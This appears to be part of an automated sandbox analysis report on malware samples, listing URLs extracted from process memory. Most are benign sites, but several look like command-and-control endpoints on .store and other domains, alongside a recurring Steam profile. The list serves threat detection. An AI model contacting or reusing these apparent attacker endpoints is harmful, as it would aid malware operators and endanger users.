Source: 4136f86ac7.exe, 00000025.00000003.3191846589.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3139784082.0000000001517000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/apie
Source: 4136f86ac7.exe, 00000025.00000003.3119814255.0000000001580000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3191607562.0000000001580000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/apih
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/apii
Source: 4136f86ac7.exe, 0000001E.00000003.2866249485.0000000000AA5000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/apiile
Source: 4136f86ac7.exe, 00000025.00000003.3072686182.0000000001517000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/apis
Source: 4136f86ac7.exe, 0000001E.00000003.2903431989.0000000005606000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/apiw
Source: 4136f86ac7.exe, 00000025.00000003.3074099471.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3072686182.0000000001564000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/c
Source: 4136f86ac7.exe, 00000025.00000003.3074099471.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3072686182.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3119814255.000000000157B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/k
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com:443/api
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com:443/apiicrosoft
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: file1.exe, 00000018.00000003.2773611648.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2773494993.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2773060112.0000000005A95000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2892615043.000000000560E000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2892291447.00000000056E1000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2892476979.000000000560B000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3059264012.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3058101617.0000000005D11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://msn.comXID/
Source: file1.exe, 00000018.00000003.2773611648.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2773494993.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2773060112.0000000005A95000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2892615043.000000000560E000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2892291447.00000000056E1000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2892476979.000000000560B000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3059264012.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3058101617.0000000005D11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://msn.comXIDv10:
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://navygenerayk.store:443/api
Source: powershell.exe, 00000019.00000002.2894050768.00000000055DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: 4136f86ac7.exe, 00000025.00000003.2988825981.00000000014EB000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://presticitpo.store/
Source: 4136f86ac7.exe, 00000025.00000003.2988825981.00000000014EB000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://presticitpo.store/0
Source: 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://presticitpo.store/api
Source: 4136f86ac7.exe, 00000025.00000003.2988825981.00000000014EB000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://presticitpo.store/h
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://presticitpo.store:443/api
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com//
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/H
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/discussions/
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/lstu
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/market/
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001507000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014CF000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/765611997243319008
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/workshop/
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900v
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3079259497.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094627589.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094047183.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3139784082.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3072686182.0000000001517000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C80f26d8df816a96
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/about/
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/explore/
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/mobile
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/news/
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/points/shop/
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/stats/
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: 4136f86ac7.exe, 00000025.00000003.3079573151.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 4136f86ac7.exe, 00000025.00000003.3079573151.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.2328896938.000000002384F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://thumbystriw.store:443/api0
Source: 4136f86ac7.exe, 0000001E.00000003.2929916767.0000000005604000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2929730577.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2929560709.00000000055EF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2918822463.00000000055EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=
Source: file.exe, 00000000.00000002.2441472631.0000000023721000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2797891117.0000000001378000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2797500848.0000000001374000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3109019791.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: file.exe, 00000000.00000002.2441472631.0000000023721000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2787061831.000000000137C000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3109019791.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: file.exe, 00000000.00000003.2182267963.000000000115F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2757140206.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756813608.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878671874.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2880010131.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039312521.0000000005C48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: file.exe, 00000000.00000003.2182267963.000000000115F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768067586.0000000005AC8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2757140206.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768191917.0000000005ABF000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756813608.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878671874.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2891340741.0000000005647000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2880010131.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2890694002.00000000056E3000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3057598446.0000000005C4F000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039312521.0000000005C48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: file.exe, 00000000.00000002.2408418198.00000000004F7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: 4136f86ac7.exe, 00000025.00000003.3079573151.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000002.2408418198.00000000004F7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: file.exe, 00000000.00000002.2408418198.00000000004F7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: 4136f86ac7.exe, 00000025.00000003.3079573151.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2408418198.00000000004F7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000002.2408418198.00000000004F7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/0x1024
Source: file.exe, 00000000.00000003.2328896938.000000002384F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2786605901.0000000005B92000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2906663974.0000000005905000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3079573151.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 4136f86ac7.exe, 00000025.00000003.3079573151.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2328896938.000000002384F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2786605901.0000000005B92000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2906663974.0000000005905000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3079573151.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2408418198.00000000004F7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.2328896938.000000002384F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2786605901.0000000005B92000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2906663974.0000000005905000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3079573151.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.2408418198.00000000004F7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
